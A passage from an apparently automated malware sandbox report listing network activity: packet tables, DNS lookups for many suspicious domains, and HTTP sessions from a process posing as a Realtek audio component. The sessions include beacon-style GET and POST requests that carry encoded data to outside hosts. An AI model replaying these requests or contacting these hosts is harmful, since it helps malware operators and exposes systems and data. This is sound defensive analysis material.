                                                                                        Dec 12, 2024 21:59:12.293042898 CET4979280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:12.406572104 CET8049792199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:12.406740904 CET4979280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:12.409281015 CET4979280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:12.522742033 CET8049792199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:12.555418015 CET8049792199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:12.555428028 CET8049792199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:12.555618048 CET8049792199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:12.555785894 CET4979280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:12.555785894 CET4979280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:12.557091951 CET4979280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:12.560050964 CET8049792199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:12.560211897 CET4979280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:12.670526981 CET8049792199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:17.573097944 CET4979380192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:17.748116016 CET8049793209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:17.748380899 CET4979380192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:17.751952887 CET4979380192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:17.927038908 CET8049793209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:17.931910038 CET8049793209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:17.931953907 CET8049793209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:17.932097912 CET4979380192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:19.258277893 CET4979380192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:20.275866985 CET4979480192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:20.452132940 CET8049794209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:20.452305079 CET4979480192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:20.459032059 CET4979480192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:20.634315014 CET8049794209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:20.639538050 CET8049794209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:20.639580965 CET8049794209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:20.639702082 CET4979480192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:21.960827112 CET4979480192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:22.979301929 CET4979580192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:23.154129028 CET8049795209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:23.154247999 CET4979580192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:23.157952070 CET4979580192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:23.158000946 CET4979580192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:23.158051014 CET4979580192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:23.333120108 CET8049795209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:23.333161116 CET8049795209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:23.333447933 CET8049795209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:23.333488941 CET8049795209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:23.342456102 CET8049795209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:23.342500925 CET8049795209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:23.342593908 CET4979580192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:24.663429976 CET4979580192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:25.679655075 CET4979680192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:25.854938030 CET8049796209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:25.855129957 CET4979680192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:25.857727051 CET4979680192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:26.032717943 CET8049796209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:26.037225008 CET8049796209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:26.037235022 CET8049796209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:26.037570000 CET4979680192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:26.039082050 CET4979680192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:59:26.214984894 CET8049796209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:59:31.054641962 CET4979780192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:31.168540001 CET8049797199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:31.168750048 CET4979780192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:31.172265053 CET4979780192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:31.286168098 CET8049797199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:31.317600012 CET8049797199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:31.317675114 CET8049797199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:31.317706108 CET8049797199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:31.317944050 CET4979780192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:31.324378967 CET8049797199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:31.324604988 CET4979780192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:32.677318096 CET4979780192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:33.694641113 CET4979880192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:33.826241016 CET8049798199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:33.826469898 CET4979880192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:33.830043077 CET4979880192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:33.961736917 CET8049798199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:33.961747885 CET8049798199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:33.961755991 CET8049798199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:33.961886883 CET4979880192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:35.332937956 CET4979880192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:36.350390911 CET4979980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:36.463944912 CET8049799199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:36.464066982 CET4979980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:36.470969915 CET4979980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:36.471029043 CET4979980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:36.584480047 CET8049799199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:36.584486961 CET8049799199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:36.584491968 CET8049799199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:36.584767103 CET8049799199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:36.584809065 CET8049799199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:36.584831953 CET8049799199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:36.585050106 CET8049799199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:36.602243900 CET8049799199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:36.602252007 CET8049799199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:36.602412939 CET4979980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:36.602427959 CET8049799199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:36.602507114 CET4979980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:36.609994888 CET8049799199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:36.610241890 CET4979980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:37.973086119 CET4979980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:38.989172935 CET4980080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:39.120630026 CET8049800199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:39.120814085 CET4980080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:39.123608112 CET4980080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:39.254616976 CET8049800199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:39.254637957 CET8049800199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:39.254777908 CET8049800199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:39.254945993 CET4980080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:39.254945993 CET4980080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:39.255618095 CET4980080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:39.385858059 CET8049800199.59.243.227192.168.11.20

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 12, 2024 21:53:51.118305922 CET6304653192.168.11.201.1.1.1
                                                                                        Dec 12, 2024 21:53:52.087838888 CET53630461.1.1.1192.168.11.20
                                                                                        Dec 12, 2024 21:54:07.638564110 CET5029953192.168.11.201.1.1.1
                                                                                        Dec 12, 2024 21:54:08.652179003 CET5029953192.168.11.209.9.9.9
                                                                                        Dec 12, 2024 21:54:08.780683994 CET53502999.9.9.9192.168.11.20
                                                                                        Dec 12, 2024 21:54:09.143277884 CET53502991.1.1.1192.168.11.20
                                                                                        Dec 12, 2024 21:54:16.838860035 CET6027053192.168.11.209.9.9.9
                                                                                        Dec 12, 2024 21:54:17.079720020 CET53602709.9.9.9192.168.11.20
                                                                                        Dec 12, 2024 21:54:30.804766893 CET5816353192.168.11.209.9.9.9
                                                                                        Dec 12, 2024 21:54:30.944294930 CET53581639.9.9.9192.168.11.20
                                                                                        Dec 12, 2024 21:54:44.145936966 CET5207853192.168.11.209.9.9.9
                                                                                        Dec 12, 2024 21:54:44.296319008 CET53520789.9.9.9192.168.11.20
                                                                                        Dec 12, 2024 21:54:57.643074036 CET5330253192.168.11.209.9.9.9
                                                                                        Dec 12, 2024 21:54:57.853765965 CET53533029.9.9.9192.168.11.20
                                                                                        Dec 12, 2024 21:55:11.265013933 CET5388953192.168.11.209.9.9.9
                                                                                        Dec 12, 2024 21:55:11.410693884 CET53538899.9.9.9192.168.11.20
                                                                                        Dec 12, 2024 21:55:24.637979984 CET6234653192.168.11.209.9.9.9
                                                                                        Dec 12, 2024 21:55:24.801911116 CET53623469.9.9.9192.168.11.20
                                                                                        Dec 12, 2024 21:55:38.274651051 CET5427353192.168.11.209.9.9.9
                                                                                        Dec 12, 2024 21:55:38.434441090 CET53542739.9.9.9192.168.11.20
                                                                                        Dec 12, 2024 21:55:51.678160906 CET4973053192.168.11.209.9.9.9
                                                                                        Dec 12, 2024 21:55:51.827811003 CET53497309.9.9.9192.168.11.20
                                                                                        Dec 12, 2024 21:56:20.125695944 CET6221553192.168.11.209.9.9.9
                                                                                        Dec 12, 2024 21:56:20.351488113 CET53622159.9.9.9192.168.11.20
                                                                                        Dec 12, 2024 21:56:33.545105934 CET5211153192.168.11.209.9.9.9
                                                                                        Dec 12, 2024 21:56:33.882544994 CET53521119.9.9.9192.168.11.20
                                                                                        Dec 12, 2024 21:56:47.354470968 CET5115153192.168.11.209.9.9.9
                                                                                        Dec 12, 2024 21:56:47.511930943 CET53511519.9.9.9192.168.11.20
                                                                                        Dec 12, 2024 21:57:00.914195061 CET4919953192.168.11.209.9.9.9
                                                                                        Dec 12, 2024 21:57:01.082228899 CET53491999.9.9.9192.168.11.20
                                                                                        Dec 12, 2024 21:57:17.191143990 CET6461953192.168.11.209.9.9.9
                                                                                        Dec 12, 2024 21:57:17.335778952 CET53646199.9.9.9192.168.11.20
                                                                                        Dec 12, 2024 21:57:38.639605999 CET5229753192.168.11.209.9.9.9
                                                                                        Dec 12, 2024 21:57:38.785505056 CET53522979.9.9.9192.168.11.20
                                                                                        Dec 12, 2024 21:58:02.399827003 CET5298053192.168.11.209.9.9.9
                                                                                        Dec 12, 2024 21:58:02.514465094 CET53529809.9.9.9192.168.11.20

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 12, 2024 21:53:51.118305922 CET192.168.11.201.1.1.10x860dStandard query (0)www.tabyscooterrentals.xyzA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:07.638564110 CET192.168.11.201.1.1.10x8624Standard query (0)www.ftaane.netA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:08.652179003 CET192.168.11.209.9.9.90x8624Standard query (0)www.ftaane.netA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:16.838860035 CET192.168.11.209.9.9.90xab11Standard query (0)www.milp.storeA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:30.804766893 CET192.168.11.209.9.9.90xa441Standard query (0)www.vavada-official.buzzA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:44.145936966 CET192.168.11.209.9.9.90x70ccStandard query (0)www.jyshe18.buzzA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:57.643074036 CET192.168.11.209.9.9.90xdbe2Standard query (0)www.furrcali.xyzA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:55:11.265013933 CET192.168.11.209.9.9.90x2178Standard query (0)www.activeusers.techA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:55:24.637979984 CET192.168.11.209.9.9.90x2637Standard query (0)www.unlimitu.websiteA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:55:38.274651051 CET192.168.11.209.9.9.90xbbd1Standard query (0)www.sob.ripA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:55:51.678160906 CET192.168.11.209.9.9.90x4158Standard query (0)www.blockconnect.techA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:56:20.125695944 CET192.168.11.209.9.9.90xeebdStandard query (0)www.guilda.proA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:56:33.545105934 CET192.168.11.209.9.9.90x1444Standard query (0)www.shandongyb.topA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:56:47.354470968 CET192.168.11.209.9.9.90x4fbStandard query (0)www.augier2619.topA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:57:00.914195061 CET192.168.11.209.9.9.90x75e7Standard query (0)www.outandaboutatlanta.netA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:57:17.191143990 CET192.168.11.209.9.9.90xd3c4Standard query (0)www.bonheur.techA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:57:38.639605999 CET192.168.11.209.9.9.90xcad0Standard query (0)www.inbulkses.shopA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:58:02.399827003 CET192.168.11.209.9.9.90xd97cStandard query (0)www.ftaane.netA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 12, 2024 21:53:52.087838888 CET1.1.1.1192.168.11.200x860dNo error (0)www.tabyscooterrentals.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 12, 2024 21:53:52.087838888 CET1.1.1.1192.168.11.200x860dNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 12, 2024 21:53:52.087838888 CET1.1.1.1192.168.11.200x860dNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:08.780683994 CET9.9.9.9192.168.11.200x8624Name error (3)www.ftaane.netnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:09.143277884 CET1.1.1.1192.168.11.200x8624No error (0)www.ftaane.netftaane.net.milaoshu.buyusdt.meCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:09.143277884 CET1.1.1.1192.168.11.200x8624No error (0)ftaane.net.milaoshu.buyusdt.memilaoshu.buyusdt.meCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:09.143277884 CET1.1.1.1192.168.11.200x8624No error (0)milaoshu.buyusdt.mex103.jieruitech.infoCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:09.143277884 CET1.1.1.1192.168.11.200x8624No error (0)x103.jieruitech.info192.197.113.112A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:17.079720020 CET9.9.9.9192.168.11.200xab11No error (0)www.milp.store194.9.94.86A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:17.079720020 CET9.9.9.9192.168.11.200xab11No error (0)www.milp.store194.9.94.85A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:30.944294930 CET9.9.9.9192.168.11.200xa441No error (0)www.vavada-official.buzz94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:30.944294930 CET9.9.9.9192.168.11.200xa441No error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:44.296319008 CET9.9.9.9192.168.11.200x70ccNo error (0)www.jyshe18.buzz172.67.131.144A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:44.296319008 CET9.9.9.9192.168.11.200x70ccNo error (0)www.jyshe18.buzz104.21.4.23A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:54:57.853765965 CET9.9.9.9192.168.11.200xdbe2No error (0)www.furrcali.xyz103.106.67.112A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:55:11.410693884 CET9.9.9.9192.168.11.200x2178No error (0)www.activeusers.tech199.59.243.227A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:55:24.801911116 CET9.9.9.9192.168.11.200x2637No error (0)www.unlimitu.website209.74.79.40A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:55:38.434441090 CET9.9.9.9192.168.11.200xbbd1No error (0)www.sob.rip94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 12, 2024 21:55:38.434441090 CET9.9.9.9192.168.11.200xbbd1No error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:55:51.827811003 CET9.9.9.9192.168.11.200x4158No error (0)www.blockconnect.tech76.223.54.146A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:55:51.827811003 CET9.9.9.9192.168.11.200x4158No error (0)www.blockconnect.tech13.248.169.48A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:56:20.351488113 CET9.9.9.9192.168.11.200xeebdNo error (0)www.guilda.pro52.223.13.41A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:56:33.882544994 CET9.9.9.9192.168.11.200x1444No error (0)www.shandongyb.top198.2.236.225A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:56:47.511930943 CET9.9.9.9192.168.11.200x4fbNo error (0)www.augier2619.top142.171.82.112A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:57:01.082228899 CET9.9.9.9192.168.11.200x75e7No error (0)www.outandaboutatlanta.netoutandaboutatlanta.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 12, 2024 21:57:01.082228899 CET9.9.9.9192.168.11.200x75e7No error (0)outandaboutatlanta.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:57:01.082228899 CET9.9.9.9192.168.11.200x75e7No error (0)outandaboutatlanta.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:57:17.335778952 CET9.9.9.9192.168.11.200xd3c4No error (0)www.bonheur.tech76.223.54.146A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:57:17.335778952 CET9.9.9.9192.168.11.200xd3c4No error (0)www.bonheur.tech13.248.169.48A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:57:38.785505056 CET9.9.9.9192.168.11.200xcad0No error (0)www.inbulkses.shop104.21.83.167A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:57:38.785505056 CET9.9.9.9192.168.11.200xcad0No error (0)www.inbulkses.shop172.67.179.56A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:58:02.514465094 CET9.9.9.9192.168.11.200xd97cName error (3)www.ftaane.netnonenoneA (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • www.tabyscooterrentals.xyz
                                                                                        • www.milp.store
                                                                                        • www.vavada-official.buzz
                                                                                        • www.jyshe18.buzz
                                                                                        • www.furrcali.xyz
                                                                                        • www.activeusers.tech
                                                                                        • www.unlimitu.website
                                                                                        • www.sob.rip
                                                                                        • www.blockconnect.tech
                                                                                        • www.guilda.pro
                                                                                        • www.shandongyb.top
                                                                                        • www.augier2619.top
                                                                                        • www.outandaboutatlanta.net
                                                                                        • www.bonheur.tech
                                                                                        • www.inbulkses.shop

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.11.204971585.159.66.93807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:53:52.346287966 CET392OUTGET /4wxo/?Hsa=KVXAK1dJ22EyzD&Sb=AuCk/wTI7zW3ld/u5VGEHIK6Kt0n3LR9prPfFK+Yc5xTqeXBXJi84rbX4QtnNLSqr4pLPSODfOM24Q7oPb8nuPFT6GxcogJfnF2+8lDPhEW1adutoQ/De7w= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.tabyscooterrentals.xyz
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:53:52.601542950 CET225INHTTP/1.1 404 Not Found
                                                                                        Server: nginx/1.14.1
                                                                                        Date: Thu, 12 Dec 2024 20:53:52 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close
                                                                                        X-Rate-Limit-Limit: 5s
                                                                                        X-Rate-Limit-Remaining: 19
                                                                                        X-Rate-Limit-Reset: 2024-12-12T20:53:57.4767818Z


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.11.2049716194.9.94.86807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:54:17.308638096 CET638OUTPOST /2j93/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.milp.store
                                                                                        Origin: http://www.milp.store
                                                                                        Referer: http://www.milp.store/2j93/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 59 78 32 2f 30 66 79 67 66 46 46 65 67 54 64 74 63 62 71 2f 6d 55 78 65 4e 47 31 35 56 59 67 32 65 51 4f 39 2b 69 6b 43 50 56 55 6a 56 76 4e 68 34 71 2f 77 67 4d 54 74 36 77 32 73 72 49 71 55 6c 2f 69 63 4f 5a 56 59 4a 35 33 6b 70 64 51 50 55 2b 65 75 31 57 61 62 6d 4f 79 53 65 6a 69 4a 4a 59 2f 35 32 38 47 78 67 4e 52 69 51 4f 4e 32 38 52 31 54 38 57 71 66 31 56 33 65 2b 38 74 31 4b 4e 72 66 4b 43 47 52 30 51 35 43 45 4b 61 52 4a 67 75 43 31 68 36 78 46 59 44 45 54 31 4c 42 76 76 53 76 36 54 45 6c 51 58 46 6d 77 34 30 71 70 31 72 7a 65 4a 6c 73 74 50 4e 6d 6e 34 32 37 69 41 3d 3d
                                                                                        Data Ascii: Sb=Yx2/0fygfFFegTdtcbq/mUxeNG15VYg2eQO9+ikCPVUjVvNh4q/wgMTt6w2srIqUl/icOZVYJ53kpdQPU+eu1WabmOySejiJJY/528GxgNRiQON28R1T8Wqf1V3e+8t1KNrfKCGR0Q5CEKaRJguC1h6xFYDET1LBvvSv6TElQXFmw40qp1rzeJlstPNmn427iA==
                                                                                        Dec 12, 2024 21:54:17.536559105 CET1289INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Thu, 12 Dec 2024 20:54:17 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.29
                                                                                        Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                        Dec 12, 2024 21:54:17.536618948 CET1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                        Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
